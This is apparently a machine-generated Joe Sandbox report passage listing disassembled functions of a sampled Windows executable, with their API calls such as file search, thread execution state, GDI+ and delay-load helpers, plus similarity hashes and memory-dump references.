Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: fe22d30fc44958ea2cd1d8019eab695f4d04139898fca5bf19a6fe124371c9d6
Instruction ID: 60dbee79dd39993079a49442ec7e2905f2c70f8723ccd756b1dfae9907b9a1fa
Opcode Fuzzy Hash: fe22d30fc44958ea2cd1d8019eab695f4d04139898fca5bf19a6fe124371c9d6
Instruction Fuzzy Hash: 7BF0E930081B259FDB308A28D84879277E9AB12321F041B1ED0F2439E0D361659D9A40

Uniqueness

Uniqueness Score: -1.00%

Function 0012A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0012A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6C4
Part of subcall function 0012A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6F2
Part of subcall function 0012A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012A592,000000FF,?,?), ref: 0012A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0012A598

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 71823bee25008a400789306d2bee8f612123e10134c665d050144eb9dd15ab8b
Instruction ID: 77aa9eaf5125813ae88857d12d25ccfa45cc7e7c489aaa6366d12826deffe56e
Opcode Fuzzy Hash: 71823bee25008a400789306d2bee8f612123e10134c665d050144eb9dd15ab8b
Instruction Fuzzy Hash: 00F082310087A0EBCB2257B4A904BCB7B916F2A331F448B49F1FD52196C37550A49B33

Uniqueness

Uniqueness Score: -1.00%

Function 00130E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00130E3D

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: d87a76842f889460d21bf947b4b9f05e0e2c6a6e67006f0fb077ce6ce859a072
Instruction ID: b67fd05b4e14f420e34af7f971e3ec9a472212d9b24bf1d7aeb55de4f43d623b
Opcode Fuzzy Hash: d87a76842f889460d21bf947b4b9f05e0e2c6a6e67006f0fb077ce6ce859a072
Instruction Fuzzy Hash: D0D02B11701164BADF1233283C257FE264A8FEA311F0C0075F0455B6C3CF4408E2A261

Uniqueness

Uniqueness Score: -1.00%

Function 0013A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0013A62C

Part of subcall function 0013A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013A3DA

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: a5675effd561f409075f6cb8158edc1b689efc87bc4b40724c37ebbe85316a24
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: E0D0C9B1214209BADF466B618C1396EBA9AEF11340F448125B8C2E5191EBB1DD10A662

Uniqueness

Uniqueness Score: -1.00%

Function 0013DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00131B3E), ref: 0013DD92

Part of subcall function 0013B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013B579
Part of subcall function 0013B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013B58A
Part of subcall function 0013B568: IsDialogMessageW.USER32(00010440,?), ref: 0013B59E
Part of subcall function 0013B568: TranslateMessage.USER32(?), ref: 0013B5AC
Part of subcall function 0013B568: DispatchMessageW.USER32(?), ref: 0013B5B6

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: d0df44aeebc8fc8caf8d516a6824ba86f83aab67eaa9ed98bbf54ab55520a710
Instruction ID: bc22415afae373cc597b58ea15b72e9a42d9cf3868156f1b91636d9f7e082b6d
Opcode Fuzzy Hash: d0df44aeebc8fc8caf8d516a6824ba86f83aab67eaa9ed98bbf54ab55520a710
Instruction Fuzzy Hash: 50D09E31148300BAD6022B51DD06F0B7AE2AB98F04F004554B384744B19BB29E61EB12

Uniqueness

Uniqueness Score: -1.00%

Function 0013E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0013E5E3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: ff6c58808d0abce60723d4276eff0a872fb7c8f767fec1ad663b0e06ea42a0f9
Instruction ID: 9c301c0d44795b21f68d99828c484f44d92103345e546f5b3e6d5c41c5d00161
Opcode Fuzzy Hash: ff6c58808d0abce60723d4276eff0a872fb7c8f767fec1ad663b0e06ea42a0f9
Instruction Fuzzy Hash: 1DD012B95C0380EBD705FBA9D84779437D9B374715FD04141F149D58E1DB6445C2CB05

Uniqueness

Uniqueness Score: -1.00%

Function 001298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,001297BE), ref: 001298C8

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5b88cebefb2da09fab6ac667eaff9068b11cb9b688df066f96f3d1d08094b13a
Instruction ID: d36a2ab6730c3440e9e6a444445d682380957c20d379da7880f07dc500c03416
Opcode Fuzzy Hash: 5b88cebefb2da09fab6ac667eaff9068b11cb9b688df066f96f3d1d08094b13a
Instruction Fuzzy Hash: 17C00234404259D68E259A38A84909A7762AB537B6BB89694D0698A4E1C322CCA7EB11

Uniqueness

Uniqueness Score: -1.00%

Function 0013E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8fa8d3baaa187225315c0faae65e7b04dc83045dd054807e4f4605eaabd6bc1
Instruction ID: cf44d0837a200e792be2d07003589ea544577c1d7403e723f91909cbda506d2a
Opcode Fuzzy Hash: e8fa8d3baaa187225315c0faae65e7b04dc83045dd054807e4f4605eaabd6bc1
Instruction Fuzzy Hash: E4B09295268300ECA10821851D06C37014CC181F11720846ABC21D44C0EA40AD041871

Uniqueness

Uniqueness Score: -1.00%

Function 0013E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1973d6faa4feaa4490e702c99d7627ca9ce842b13f71d5eac40512d3475c00e0
Instruction ID: 672fc1c4739bc62cee8da4dec9fdb426b8c6cd0e86c221c0b01e6801ae79f715
Opcode Fuzzy Hash: 1973d6faa4feaa4490e702c99d7627ca9ce842b13f71d5eac40512d3475c00e0
Instruction Fuzzy Hash: 23B012D1368300ECB10876451D06C37018CC1C1F11734C07EFC25C41C0EB40AD080D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2dd34a8e986b1942dfcd55ade3855add4f3a4734c94944f166b53645aeae9ca5
Instruction ID: 030bff1c135c831787bf1e9787abf5d6f6b7bd0c9abeada27189dfbe5b38f571
Opcode Fuzzy Hash: 2dd34a8e986b1942dfcd55ade3855add4f3a4734c94944f166b53645aeae9ca5
Instruction Fuzzy Hash: 3BB09295268300ECB10861891906C37018CC180F11720806AB825C40C0AA406D041A71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 39905d9ae2d5b5d9fb5d41d361f6853cf53c0f5d1ef12830355e831cffcbe56d
Instruction ID: 691eda655e6b0993899c92ca90fe196ae78906de7a79cf52180f4b8b03a278ac
Opcode Fuzzy Hash: 39905d9ae2d5b5d9fb5d41d361f6853cf53c0f5d1ef12830355e831cffcbe56d
Instruction Fuzzy Hash: 64B012E1368300FCB10871451D06C37018DC1C1F11730C07EFC25C40C0EB40AE040D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f7613f6aaace853a386bcb732c295a3ef57eaacf3750536ee5ec46e6e1c9eaf
Instruction ID: cf3dce0267814d8308f2e33d049a719e1136583c9c1afbdcafe0d3526a41cb49
Opcode Fuzzy Hash: 7f7613f6aaace853a386bcb732c295a3ef57eaacf3750536ee5ec46e6e1c9eaf
Instruction Fuzzy Hash: B3B09291368340ECA14862455906C37018CC180F11724816AB825C41C0AA4069480A71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 150c9d1633460280250a7808acc95477f2fc86a2ad46da5f017a22ece802e4ff
Instruction ID: 795646b58bec094bf1910a6ef9fd12ecb689cd32c08e77909c879f06aaa0cd3e
Opcode Fuzzy Hash: 150c9d1633460280250a7808acc95477f2fc86a2ad46da5f017a22ece802e4ff
Instruction Fuzzy Hash: 0FB09291268200ECA10862451A06C37018CC180F11724806AB825C41C0AA516A090971

Uniqueness

Uniqueness Score: -1.00%

Function 0013E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 799f895e1987f9c7efa7c671edf06cf104b1fcb0282bf4a48e262cc8f7ddea2d
Instruction ID: 48e1d5885400f71a357afd01da85335e63b4c86758e2ff178a14cf7cd9a2920b
Opcode Fuzzy Hash: 799f895e1987f9c7efa7c671edf06cf104b1fcb0282bf4a48e262cc8f7ddea2d
Instruction Fuzzy Hash: 5CB012E1368300ECB10871451E46C37018DC1C0F11730807EFC25C40C0EF416F050D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a67b775133911b0cd0620e03fb30f6868ed00491db6942baab17f31e519c105
Instruction ID: 3d314449edb017f93ed493cc7204666e58abbcc3523afdc8e60823b21690194a
Opcode Fuzzy Hash: 1a67b775133911b0cd0620e03fb30f6868ed00491db6942baab17f31e519c105
Instruction Fuzzy Hash: 5AB012E1368300ECB10871461D06C37018DC1C0F11730807EFC25C40C0EB406E040D71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69ad5ad4aef10adbd4ef0287892d5910f95ef91c57f84fb056e1621e93a6f207
Instruction ID: 2d786c2411adc0972f142f0b2c0d8923fa0689f233725acc708b3b2e687b1e44
Opcode Fuzzy Hash: 69ad5ad4aef10adbd4ef0287892d5910f95ef91c57f84fb056e1621e93a6f207
Instruction Fuzzy Hash: BEB012E1368300FCB14871455D06C37018DC1C0F11B30817EFC25C40C0EB416E440E71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
Part of subcall function 0013E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013E8E1

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a29b6d78ec5eff784e60d5c48be9d6b33a15bb32dc6938a5bb3c34f3038d9f9
Instruction ID: 786d65c8a3ed9675087cf782510942c55448ab5472d7606325cb91d3ade82e33
Opcode Fuzzy Hash: 9a29b6d78ec5eff784e60d5c48be9d6b33a15bb32dc6938a5bb3c34f3038d9f9
Instruction Fuzzy Hash: 55B012E1369340FCB14872455D06C37018DC1C0F11B30817EFC25C40C0EB406D480E71

Uniqueness

Uniqueness Score: -1.00%

Function 0013E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0013E1E3

Part of subcall function 0013E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013E8D0
